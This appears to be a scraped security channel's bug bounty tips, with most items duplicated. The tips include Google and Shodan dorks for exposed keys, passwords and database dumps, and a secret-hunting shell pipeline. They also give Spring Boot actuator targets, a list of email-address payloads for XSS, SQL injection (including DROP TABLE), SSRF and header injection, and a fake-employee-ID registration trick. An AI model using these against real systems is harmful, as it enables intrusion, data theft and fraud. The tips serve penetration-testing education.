#Bug_Bounty_Tips_9
🛡BugBounty_Tips
Sometimes, developers think that hiding a button is enough. Try accessing the following sign-up URIs.
Chances are that we will be able to register a new user and access privileged areas of the web application, or at least get a foothold into it.
☣️@InfoSecTube
🛡BugBounty_Tips
Sometimes, developers think that hiding a button is enough. Try accessing the following sign-up URIs.
Chances are that we will be able to register a new user and access privileged areas of the web application, or at least get a foothold into it.
☣️@InfoSecTube
#Bug_Bounty_Tips_10
🛡BugBounty_Tips
Here are Top 5 Google dorks for identifying interesting and potentially sensitive information about our target:
With these dorks we are looking for open directory listing, log files, private keys, spreadsheets, database files and other interesting data.
☣️@InfoSecTube
🛡BugBounty_Tips
Here are Top 5 Google dorks for identifying interesting and potentially sensitive information about our target:
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
With these dorks we are looking for open directory listing, log files, private keys, spreadsheets, database files and other interesting data.
☣️@InfoSecTube
#Bug_Bounty_Tips_11
🛡BugBounty_Tips
If you are hunting on a Drupal website, fuzz with Burp Suite Intruder (or any other similar tool) on ‘/node/$’ where ‘$’ is a number (from 1 to 500). For example:
Chances are that we will find hidden pages (test, dev) which are not referenced by the search engines.
☣️@InfoSecTube
🛡BugBounty_Tips
If you are hunting on a Drupal website, fuzz with Burp Suite Intruder (or any other similar tool) on ‘/node/$’ where ‘$’ is a number (from 1 to 500). For example:
https://target.com/node/1
https://target.com/node/2
https://target.com/node/3
…
https://target.com/node/499
https://target.com/node/500
Chances are that we will find hidden pages (test, dev) which are not referenced by the search engines.
☣️@InfoSecTube
#Bug_Bounty_Tips_12
🛡BugBounty_Tips
Before use this script you must install additional tools:
gau
fff
gf
gf-secrets
Find sensitive information disclosure using special gf-secrets patterns. Here’s how to use them:
🛡BugBounty_Tips
Before use this script you must install additional tools:
gau
fff
gf
gf-secrets
Find sensitive information disclosure using special gf-secrets patterns. Here’s how to use them:
# Search for testing point with gau and fff☣️@InfoSecTube
gau target -subs | cut -d"?" -f1 | grep -E "\.js+(?:on|)$" | tee urls.txt
sort -u urls.txt | fff -s 200 -o out/
# After we save responses from known URLs, it's time to dig for secrets
for i in `gf -list`; do [[ ${i} =~ "_secrets"* ]] && gf ${i}; done
#Bug_Bounty_Tips_13
🛡BugBounty_Tips
✔️Spring Boot is an open source Java-based framework used to build stand-alone spring applications based on the concepts of micro services.
🔰Spring Boot Actuator is a mechanism of interacting with them using a web interface. They are typically mapped to URL such as:
🔶https://target.com/env
🔸https://target.com/heapdump
🔸etc.
#Shodan_Dorks
♦️Search for the following favicon hash in Shodan to find Spring Boot servers deployed in the target organization:
🔺Then check for exposed actuators. If /env is available, you can probably achieve RCE. If /heapdump is accessible, you may find private keys and tokens.
☣️@InfoSecTube
🛡BugBounty_Tips
✔️Spring Boot is an open source Java-based framework used to build stand-alone spring applications based on the concepts of micro services.
🔰Spring Boot Actuator is a mechanism of interacting with them using a web interface. They are typically mapped to URL such as:
🔶https://target.com/env
🔸https://target.com/heapdump
🔸etc.
#Shodan_Dorks
♦️Search for the following favicon hash in Shodan to find Spring Boot servers deployed in the target organization:
org:YOUR_TARGET http.favicon.hash:116323821
🔺Then check for exposed actuators. If /env is available, you can probably achieve RCE. If /heapdump is accessible, you may find private keys and tokens.
☣️@InfoSecTube
#Bug_Bounty_Tips_14
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and api keys, customer data and more.
☣️@InfoSecTube
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
setup.sql
sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and api keys, customer data and more.
☣️@InfoSecTube
#Bug_Bounty_Tips_15
🛡BugBounty_Tips
🌀The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.
🔺XSS (Cross-Site Scripting):
🔺Template injection:
🔺SQL injection:
🔺SSRF (Server-Side Request Forgery):
🔺Parameter pollution:
🔺(Email) header injection:
☣️@InfoSecTube
🛡BugBounty_Tips
🌀The following payloads are all valid e-mail addresses that we can use for pentesting of not only web based e-mail systems.
🔺XSS (Cross-Site Scripting):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
🔺Template injection:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
🔺SQL injection:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
🔺SSRF (Server-Side Request Forgery):
[email protected]
john.doe@[127.0.0.1]
🔺Parameter pollution:
victim&[email protected]
🔺(Email) header injection:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com
☣️@InfoSecTube
#Bug_Bounty_Tips_16
🛡BugBounty_Tips
🌀Registering as an Employee leads to claim of Employee Only Private Offers and ultimately getting an “Identification Card”.
Methodolgy:
1-Searched for Target‘s employee offers on Google:
3-Found that offers were restricted to employees only.
4-Tried registering with random numbers in the “Employee ID” field
5-Successfully registered as an employee because of no verification of the “Employee ID“.
6-Registering as an employee leads to claim of private offers.
7-The website also provides an “Identification Card” which can be used to show that we are a legitimate employee of the Target.
☣️@InfoSecTube
🛡BugBounty_Tips
🌀Registering as an Employee leads to claim of Employee Only Private Offers and ultimately getting an “Identification Card”.
Methodolgy:
1-Searched for Target‘s employee offers on Google:
inurl:"Target Name" employee offers2-Found website which provides offers to the Target.
3-Found that offers were restricted to employees only.
4-Tried registering with random numbers in the “Employee ID” field
5-Successfully registered as an employee because of no verification of the “Employee ID“.
6-Registering as an employee leads to claim of private offers.
7-The website also provides an “Identification Card” which can be used to show that we are a legitimate employee of the Target.
☣️@InfoSecTube
#Bug_Bounty_Tips_17
🛡BugBounty_Tips
Here’s an example of exposed RocketMQ
RocketMQ is a distributed messaging and streaming platform with low latency, high performance and reliability, trillion-level capacity and flexible scalability.
this time to pull up RocketMQ console which often has quite confidential production information disclosed(Shodan Dorks):
1-Additional hostnames and subdomains
2-Internal IP addresses
3-Log file locations
4-Version details
5-etc
🛡BugBounty_Tips
Here’s an example of exposed RocketMQ
RocketMQ is a distributed messaging and streaming platform with low latency, high performance and reliability, trillion-level capacity and flexible scalability.
this time to pull up RocketMQ console which often has quite confidential production information disclosed(Shodan Dorks):
org:target.com http.title:rocketmq-consoleFrom the exposed RocketMQ consoles we can for example find out:
1-Additional hostnames and subdomains
2-Internal IP addresses
3-Log file locations
4-Version details
5-etc